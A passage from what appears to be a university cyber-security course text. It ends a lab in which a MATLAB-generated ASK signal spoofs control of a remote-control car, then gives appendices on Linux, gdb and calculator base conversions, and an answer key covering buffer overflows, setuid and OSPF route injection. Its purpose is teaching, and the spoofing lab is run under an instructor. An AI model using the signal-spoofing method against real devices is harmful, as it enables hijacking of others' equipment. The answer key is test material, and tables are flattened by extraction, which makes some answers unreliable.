linspace(0,(1/fs).*time_stop, length(up_data)); % Upsample for i = 0:length(data)-1 up_data(sam_per_sym.*i + 1 : sam_per_sym.*i + sam_per_sym) = data(i+1); end % Generate the "baseband" (IF) waveform s_lo = cos(2.*pi.*fif.*time); s_if = s_lo.*up_data; soundsc(s_if,fs) end %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% □ □ □ When your code is updated, run it by pressing (the run button). Follow the next instruction carefully! Double click your cursor in the MATLAB Command Window. If all went as planned you should see a window opening and closing rapidly. Press and hold your arrow keys to simulate driving your vehicle. Question 20: What do you hear? What type of signal is being generated? Question 21: What do you need to do to transmit this baseband binary signal so that the car receives it? Get your instructor’s signature to continue. 567 Your instructor will use the same signal generator that transmitted the jamming signal in Part II to transmit the modulated ASK signal. The set up looks like this: □ Bring your laptop to your instructor and get ready to drive! Question 22: Do you need the car’s transmitter to control the car? What just happened? What is now controlling the car? Question 23: List some examples of how this might be significant in a military setting. Need ideas? Check this out! http://www.engr.utexas.edu/features/humphreysspoofing. 568 Appendices 569 570 Basic Linux Commands I. Basic Linux Commands The information below presumes you are familiar with the Linux file system and that you understand how to refer to files and directories using absolute and relative pathnames. You should also be familiar with the commands cd (change directory) and ls (list). This prerequisite information is available in the handout named The Linux File System available as a link under the Resources tab on the EC310 course website. We will now address some basic file and directory operations. To copy a file from one location to another, we use the cp command. For example, in the file system below if dane was in his home directory, and wanted to give bob a copy of the file named homework4, placing it directly in bob’s home directory, he would type cp Cyber/homework4 the item to be copied ../bob where the copy is to be placed To create a file from scratch, you can open the file using nano, as you’ve done for all the programs you’ve entered in EC310. To move a file, we use the command mv command. In the file system shown above, if user dane wanted to move the file named spoofing to place it under the Cyber directory, he would enter mv spoofing Cyber 571 To view a file, we use the command cat followed by the filename (if it is right in your working directory) or cat followed by the absolute or relative pathnames (if the file is not right in your working directory). To remove a file, use the command rm followed by the file name (or pathname as applicable). We can, in like manner, create a new directory using mkdir followed by the directory name (if we want to place the directory right under the working directory) or mkdir followed by the pathname where we want to place the new directory. Finally, we can delete directories by using the command rmdir followed by the directory name or pathname as appropriate. Note that you can only remove an empty directory, so to delete a directory you must first delete all of its contents. You should realize that we have only scratched the surface of using the Linux bash shell. You should not place "Linux System Programmer" on your resume. But what you have learned, along with your use of the gcc compiler, the gdb debugger and permission management (covered in Lessons 8 and 9) is more than enough for EC310. 572 The Linux File System I. The Linux File System 1. Introduction All users of a Linux OS have an account name (also referred to as a user name or a login name) and a password. When your Linux account is created, you are also given a home directory where all of your files and folders will reside. Your home directory has the same name as your account name. You may be wondering: Hey, I’m using Linux in EC310 and I was never asked for an account name and password while logging on? That is because your textbook author (Jon Erickson) has set up your VMware software to provide Linux “already open” for you. We have, however, changed your account name to midshipman since that is, after all, your first name. You have been entering commands using the bash shell as your command line interface. Every time you have entered a command such as gcc –g smith_2_1.c or nano smith_2_1.c you have entered that command at the bash shell’s prompt. The bash shell’s prompt for ordinary users is the dollar sign. Before the prompt, you will see your account name and your computer's name. Your account name Your computer's name The prompt There is one additional item in the picture above that you may have noticed: the tilde symbol (~). The tilde is an abbreviation for your home directory. When you log in, you are placed by default in your home directory. If you wander up to a computer and notice that someone is logged on, and you see then the user whose account name is joe has logged in but has forgotten to log out. Shame on him. Too bad. If you ever forget who you are, even though your account name is staring you in the face, you can enter: whoami as shown below: In Linux, just as with Windows, there are files. And in Linux, just as with Windows, there are directories (in Windows terminology, these are referred to as folders), which hold files (or other directories). 573 A Linux system (like a Windows system) may support multiple users. In such cases, each user is given his own home directory. When you logon, you are automatically placed in your home directory. When Joe logs on, he is automatically placed in his home directory. Your home directory is the natural location for any directories or files that you create. You can leave your home directory and move to other directories. Whatever directory you find yourself in, that directory is termed your working directory. A typical Linux file system (also called a directory structure) might look like this: At the very top is the root directory, denoted /. The root directory contains all directories and files. 2. Absolute Pathnames Every file can be referenced by its absolute pathname, which starts at the root directory and traipses down the inverted tree structure, with each entry also separated by a forward slash. For example, the absolute pathname for the directory joe is /home/joe Note that in an absolute pathnames, the slash (/) character has two different meanings. The first slash always refers to the root directory. Any other slashes that may be present simply serve as separators. Since absolute pathnames can be long, a few shortcuts are provided: To specify a directory or file in your current directory, you can use just the name of the directory or file. A tilde serves as an abbreviation for your own home directory. A tilde followed by another user’s name serves as an abbreviation for that other user’s home directory In the Linux command line, preceding the prompt, you are also provided with an indication of your current working directory. If you are in your home directory (which, as an absolute path name for our classwork in EC310, might be something like /home/midshipman ), this will appear as just a tilde since, recall, a tilde serves as an abbreviation for your own home directory. 3. Relative Pathnames Whereas absolute pathnames always start from the root, relative pathnames start from your current location (i.e., your working directory). The notation relies on the use of two dots (..) to serve as an abbreviation for the immediate parent of the current directory. 574 As an example, in the picture above, if your working directory is dane, the relative pathname of the home directory is simply: .. On the other hand, if your working directory is bob, the relative pathname of the directory Hacking would be ../dane/Hacking . In other words, to get from bob to Hacking, you first must go up one directory to home (the parent directory, represented by the two dots), then from home you go down one directory to dane, and then down to Hacking. Another shortcut is also available for use in relative pathnames. A single dot (.) can be used as a shorthand notation for your current working directory. 4. Listing Files You can list the contents of the working directory by using the ls command. For example, if, in the picture above, your working directory was dane, then the command ls would yield the results: Hacking Cyber spoofing You can list the files in a different directory by typing ls followed by the absolute or relative pathname of the directory you are seeking information about. For example, if your working directory was dane and you entered ls ../bob , the result would be: Acme Ramshead 5. Changing Your Working Directory To change your working directory to another directory, simply enter the command cd followed by the directory you wish to change to. For example, if your working directory was dane, you could change your working directory to bob by entering cd ../bob When you change your working directory, the command line will update to indicate your new working directory. For example, if I am the user named midshipman and I change my directory to a subdirectory named work, I will see as my new prompt: Working directory changed to ~/work If you find yourself lost in the file system, you can instantly reset your working directory back to your home directory by simply typing cd by itself. You may have already noticed that we have changed our working directory at the start of most security exercises by typing: cd booksrc 6. The root User Every Linux system has a special user named root. The root user is the great-andall-powerful system administrator of the Linux system. The root user can access any file on the system, including the files of individual users. The root user can read the files of all users, can write over any files, and can delete any files. The root user can load any software onto the system (e.g., programs). The root user owns the system. The dream of all hackers is to somehow become the root user. In Linux, the root user has a special prompt, the pound sign (#). If you walk up to a computer and see this: 575 that means the root user has logged in and left the computer unattended. That would be bad. 576 Brief Primer on gdb Getting started. Assume our C program is named test.c. The program is shown below. #include<stdio.h> int main( ) { int a = 2; int b = 1000; char x = '$' ; char phrase[4] = "Fun" ; printf( "Yes"); printf("No"); } To run the debugger on the compiled version of test.c, always start by entering: gcc –g test.c gdb –q ./a.out set dis intel list If your source code is more than 10 lines, you may have to hit enter again, to list the next 10 lines. We see this: midshipman@EC310-VM:~ $ gcc -g test.c midshipman@EC310-VM:~ $ gdb -q ./a.out Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1". (gdb) set dis intel (gdb) list 1 #include<stdio.h> 2 int main( ) 3 { 4 int a = 2; 5 int b = 1000; 6 7 char x = '$' ; 8 9 char phrase[4] = "Fun" ; 10 (gdb) 11 printf( "Yes"); 12 13 printf("No"); 14 } (gdb) The line numbers shown on the left can be very useful for setting breakpoints. For example, if I wanted to run the program but have it pause right between the two final printf statements, I would enter break 12 run 577 (You have already seen us set a breakpoint at main by entering break main… this is the same idea.) Looking at Memory Based on our program, we should have the following items stored in memory: 2 1000 '$' "Fun" The strings "Yes" and "No" are also in memory somewhere, but we'll concentrate just on the integers 2 and 1000, the character '$' and the string "Fun". If I were to look into memory, I would see this (where all values are hexadecimal): Looking at this section of memory, it may not be obvious where items are stored. Here is where the integers 2 and 1000, the character '$' and the string "Fun" are placed: The string "Fun" Consulting the handy-dandy ASCII table, we see: Character F u ASCII hexadecimal value 46 75 578 n 6e So, sure enough, there it is at memory location bffff808. You should also note that the NULL terminator appears as the character immediately following the 'n' in "Fun" . Looking at the memory on the bottom of the previous page, try to guess what will be displayed by each of the following commands. (The answers immediately follow.) (a) (b) (c) (d) x/xb x/xh x/xw x/xs 0xbffff808 0xbffff808 0xbffff808 0xbffff808 Answers: (a) (b) (c) (d) 46 (displays a byte) 7546 (displays two bytes) 006e7546 (displays four bytes) "Fun" (displays as a string) For (b) and (c), note the annoying little-endian. We can specify the number of units we wish to have printed out by placing a number after the slash. For example, looking at the memory on the bottom of the previous page, try to guess what will be displayed by each of the following commands. (The answers immediately follow.) (a) (b) (c) (d) (e) x/xb x/2b x/3b x/4b x/2h 0xbffff808 0xbffff808 0xbffff808 0xbffff808 0xbffff808 Answers: (a) (b) (c) (d) (e) 46 (displays a byte) 0x46 0x75 (displays two bytes) 0x46 0x75 0x6e (displays three bytes) 0x46 0x75 0x6e 0x00 (displays four bytes) 0x7546 0x006e (notice that each half-word is presented in annoying little-endian) If we suspect that characters are being stored, we can ask that the display be presented as characters by specifying the c format. Looking at the memory on the bottom of page 584, try to guess what will be displayed by each of the following commands. (The answers immediately follow.) (a) (b) (c) (d) x/c x/2c x/3c x/4c 0xbffff808 0xbffff808 0xbffff808 0xbffff808 579 Answers: (a) (b) (c) (d) 70 70 70 70 'F' 'F' 'F' 'F' 117 'u' 117 'u' 110 'n' 117 'u' 110 'n' 0 '\0 Suppose we thought an integer was stored at address 0xbffff808. We could check this be entering x/dw 0xbffff808 If we do this, we see: 0xbffff808: 7238982 Can you guess where on Earth this value 7238982 comes from? Answer: We saw earlier that entering: x/xw gave us 006e7546. If we convert the hexadecimal value 006e7546 to a decimal integer, we find its value is 7238982. The character $ Looking at the bottom of page 584, we see the $ character is stored at location bffff80f. Looking at the memory on the bottom of page 584, try to guess what will be displayed by each of the following commands. (The answers immediately follow.) (a) (b) (c) (d) x/xb x/c x/db x/s 0xbffff80f 0xbffff80f 0xbffff80f 0xbffff80f Answers: (a) (b) (c) (d) 0x24 36 '$' 36 $�\003 Note that 0x24 equals 3610, and that that the last item is gibberish because a string is not stored in this location. The integer 1000 So, first, we should convert the decimal value of 1000 to hexadecimal. If we do this, we find it is equal to 0x3e8. With reference to the bottom of page 584, answer the following questions. (a) Why is 1000 stored in four bytes if it only needs two bytes? 580 (b) Presuming this value does take four bytes, and thus is equal to 0x000003e8, why is it not stored with the leading two zeros at the "top" memory locations? Answers: (a) (b) All integers are stored in four bytes, even if fewer are needed. Little endian, little endian, little endian. Looking at the memory on the bottom of page 584, try to guess what will be displayed by each of the following commands. (The answers immediately follow.) x/xb x/xh x/d x/2c 0xbffff810 0xbffff810 0xbffff810 0xbffff810 Answers: (a) (b) (c) (d) 0xe8 0x03e8 1000 gibberish So… do you think you get it? To see, try this: Your friend types x/d 0xbffff813 and sees that the result is 512. Explain! 581 582 Performing Base Conversions on the T1-nSpire CAS Calculator Performing base conversions on your TI-nSpire calculator is relatively straightforward. Becoming proficient at using your calculator this way will be useful to you throughout the course, especially as we begin to perform complex mathematical operations in different number bases. 1. Setup To begin, ensure that your calculator is set up in the “Auto” calculation mode and the “Decimal” base system. Your calculator is probably already set up this way, but check it just to be sure. To check these settings use the following key sequence: Press [home] Press 5: Settings Press 2: Document Settings Your screen should now look similar to this: Use the navigation pad to move down to the Calculation Mode setting. This is the navigation pad If you get to the Calculation Mode setting and it’s not set to “Auto”, then push the navigation pad to the right to bring up the menu of Calculation Mode options. Use the navigation pad to move up or down to select “Auto”, then press the enter key. 583 Repeat this procedure to ensure the Base is set to decimal. Once the Calculation Mode and Base are properly set, repeatedly press down on the navigation pad until OK is highlighted and press the enter key. If you see the dialog box below, press the enter key to select OK. 2. Conventions Now that your calculator is set up properly, the following conventions apply: Decimal numbers are typed with no special notation (e.g. 2015) Hexadecimal numbers are typed by preceding the number with “0h”. That’s a zero, not letter “O” (e.g. 0h3EA) Binary numbers are typed by preceding the number with “0b”. Again, it’s zero, not letter “O” (e.g. 0b100101) 3. The Conversion Operator Conversion among different bases is handled through the use of the “conversion operator”. It’s a single character that looks like a right-facing sideways triangle: ► To access this character you need to bring up the symbol palette on your calculator. You do that by pressing and releasing the ctrl key, followed by pressing and releasing the symbol palette key. The symbol palette will then pop-up. The keys and the palette are identified in the picture on the next page. 584 ctrl key symbol palette key conversion operator symbol palette You select the conversion operator by pressing the enter key. The operator will then show up in your display. That seems like a lot of steps for a single character, but it’s not too bad. Once you’ve selected the operator for the first time, the nSpire calculator remembers that position on the symbol palette. Hereafter, to select the conversion operator you simply press these three keys one after the other: cntl, symbol palette, enter For the remainder of this document, I’ll use ► as shorthand for, “press cntl, symbol palette, enter.” 4. Performing Conversions Now we’re ready to put this to good use. Let’s jump right in using some of the examples from the first lecture. I’ll use this notation, [enter], to mean, “press the enter key”. Problem: Express the binary number 0b110110 as a decimal number. Type: 0b110110 [enter] Solution: 54 Because the calculator is set up to perform Auto Calculations in the Decimal Number System, we don’t have to use the conversion operator in this example. Simply typing a number in binary (with the leading “0b”) and pressing enter will tell the nSpire to output the result in decimal. Note, if you leave off the leading “0b” and type this: 110110 [enter], the nSpire will output 110110. That’s because the calculator assumes you entered: One hundred ten thousand, one hundred and ten (the decimal number). 585 Problem: Convert the decimal number 148 to binary. Type: 148 ► base2 [enter] Solution: 0b10010100 Here we learn how to tell the nSpire that we want to convert to some other base besides decimal by typing the characters “base2”. Note, the nSpire will capitalize the “b” in “base2” for you and redisplay your input as: 148►Base2 Problem: Express the hexadecimal number 0x3CB as a decimal number. Type: 0h3cb [enter] Solution: 971 Remember, absent any specified base the nSpire defaults all results to decimal. Also, you will usually see hexadecimal numbers written with the “0x” prefix in this class. Just remember that the nSpire expects to see “0h” as the prefix for hexadecimal numbers. Problem: Convert the decimal number 2576 to hexadecimal. Type: 2576 ► base16 [enter] Solution: 0hA10 Problem: Convert the hexadecimal number 0x13F to binary. Type: 0h13f ► base2 [enter] Solution: 0b100111111 Problem: Convert the binary number 0b110101001 to hexadecimal. Type: 0b110101001 ► base16 [enter] Solution: 0h1A9 Simple calculations are great, but real power comes in more complex calculations. That’s because you can write statements with calculations on the left side of the conversion operator symbol (►). Let’s look at an example: Problem: A section of memory beginning at address 0xD213AC53 contains 438 bytes of data (one byte of data per address line). The address space looks like this: Address 0xD213AC53 0xD213AC54 0xD213AC55 0xD213AC56 … … … Data 45 88 3C E2 … … … 586 What hexadecimal memory address comes next after the end of the 438 bytes of data? Type: 0hd213ac53 + 438 ► base16 [enter] Solution: 0hD213AE09 For these examples I used “0x” in the problem statement and “0h” in the calculations on purpose. Remember, the nSpire needs to see the “0h” prefix to represent hexadecimal numbers, but you’ll often see it written in problems as “0x”. If you make a mistake and type 0xd213ac53 it will be obvious because the nSpire will assume you want to multiply zero (0) times xd213ac53 and will show you the result equals zero (0). After a little practice you’ll get the hang of it and find that you can perform very complex calculations in different bases quite easily. 587 588 Answers to Selected Problems Chapter 1 Problem 6: The hard drive. Problem 9. Writing the value of the position below each bit we have 1 0 0 32 16 8 0 4 0 2 0 1 The only position that has a bit value of 1 is the position corresponding to 32. Thus 1000002 3210 Problem 10. 101012 2110 . Problem 13. 7810 1001110 2 Problem 16. 0x27 is equivalent to 39 in base-10. Problem 18. 0x100 is 100000000 in binary. Problem 21. Since the first hexadecimal digit is C, the first four bits are 1100. Thus, the fourth bit is a zero. Note how more difficult this question would have been if the address was provided in base-10 instead of in base-16. Problem 26. 0x8D4. Problem 29. 16 into 730 gives a quotient of 45 with a remainder of A 16 into 45 gives a quotient of 2 with a remainder of D 16 into 2 gives a quotient of 0 with a remainder of 2 Thus, 73010 0x2DA . Since we are asked to use the number of hex digits appropriate for the x86 architecture, we must use 8 hex digits. Thus, the final answer is 0x000002DA Chapter 2 Problem 2. #include <stdio.h> int main( ) { float tempF, tempC; printf("Please enter your Fahrenheit temperature: "); scanf("%f", &tempF); tempC = (5.0/9.0)*(tempF - 32.0); printf("The equivalent Celsius temperature is %f. \n", tempC); } 589 Problem 6. (a) Machine code (b) High-level code (c) assembly code Chapter 3 Problem 1. Problem 4. (a) (b) Assembly language This instruction takes the 4 byte value 0x08048484 and stores it in the memory location that is stored in the esp register. Problem 10. (a) (b) 2 Howitzer Torpedoes Problem 11. (a) (b) (c) mov DWORD PTR [ebp-4],0x5 ebp-4 = 0xbffff814 0x0804838b char (b) Chapter 4 1. (a) string 5. C doesn’t check/prevent access of an element outside the range of an array. 6. (a) (b) (c) 20 bytes 7 The (garbage) value stored in memory immediately below the array would be displayed. Chapter 5 8. (e) 9. My teacher is LCDR Agood day by all! 590 Chapter 6 3. (d) 4. Address: Data: What is Represented: Stack Frame Info: 0xBFFFF810 0xBFFFF811 0xBFFFF812 0xBFFFF813 0xBFFFF814 0xBFFFF815 0xBFFFF816 0xBFFFF817 0xBFFFF818 11 00 00 00 g esp_main 42 00 fox[0] fox[1] ebp_main Chapter 7 4. (a) (b) (c) (d) No. The program is writing more data into the buffer than it can hold—i.e., a buffer overflow. 10 bytes (9 characters plus the NULL). Increase the size of the buffer or only copy five characters and stop (strncpy). 5. (a) 15 Bytes of Array + 4 Bytes of int + 4 bytes of prev_ebp = 23 characters. Note that a NULL character is automatically appended to the end. (b) No, because year precedes the start of the buffer as it is declared last. Therefore if you write past the end of the buffer you will overwrite name_len, not year. Chapter 8 5. Answer is (a). Chapter 9 5. (a) atwood (b) read, execute (c) chmod o+x gethappy.exe followed by chmod o+r gethappy.exe (or, alternatively: chmod o=rx gethappy.exe). 6. (a) setuid (set user id) (b) When the user executes the file, they execute the file as the owner of the file. 591 Chapter 11 7. Application Transport Network Data Link Physical __d__ __b__ __e__ __a__ __c__ Chapter 12 8. (a) 10 Mbps / 6 hosts equals approximately 1.67 Mbps per host (b) 10 Mbps / 4 hosts = 2.5 Mbps per host (c) 10 Mbps / 2 Hosts = 5 Mbps per host Chapter 13 5 Answer is (a) 6 (b) 83 78 a8 1f = 131.120.168.31 7 (a) (b) (c) (d) 255.255.224.0 136.52.96.0 136.52.127.255 8192 8. Every packet is an independent entity, possible traveling over different paths from source to destination 10. 146.25.128.0 13. 32 ; 8 ; 0 ; 255 14. To extract the network ID from an IP address (or to extract the network address). 15. (a) (b) (c) (d) 19. (a) True 20. The valid ones are (b), (d) and (e) 21. (a) (b) (c) (d) 128.32.14.0 9 510 128.32.15.254 (b) True (c) False (d) False 2^5 – 2 = 30 137.18.129.10000001 = 137.18.129.129 137.18.129.10011110 = 137.18.129.158 137.18.129. 10011111 = 137.18.129.159 592 Chapter 15 5. (a) Distance vector (b) Link state 6. Destination A B C D E Next element A I I E Total cost 5 3 0 2 5 Chapter 16 6. The assumption is that each router can trust the information that other routers are sending it. 7. (a)-(c): (d). No, the first and last IP addresses of the false network are 8.9.7.80 and 8.9.7.95, respectively. The webserver’s IP address does not fall within that range. Thus, all traffic destined for the website will not go to the attacker, but towards the webserver as normal. (e): Solution #1 Solution #1 a simple plaintext-password: added to all LSPs so each router can authenticate the information it is receiving. Solution #2 an MD5-hash of the OSPF packet and a shared secret key: in OSPF, routers can send the hash of the OSPF packet and a shared secret key along with their LSP to authenticate themselves with other routers. Solution #3 passive interface: once a network administrator sets up a passive interface on a router, the router will ignore all routing information being sent over that interface. (f) The Network Administrator 593 Chapter 17 10. Scalability - Routing tables would become huge. Administration - owners of individual networks may want to set their own rules for routing within their networks, without being concerned with what rules others are electing to follow. 11. San Fran: eBGP; Washington: neither; Paris: eBGP and iBGP; Bonn: neither Chapter 18 5. 6. R4 BGP Path Table Networks Next AS N8, N9 R1 AS1, AS2 N10, N11, N12 R1 AS1, AS3 N13, N14, N15 R9 AS1, AS4 Total Cost: 3+3+3+1 = 10 594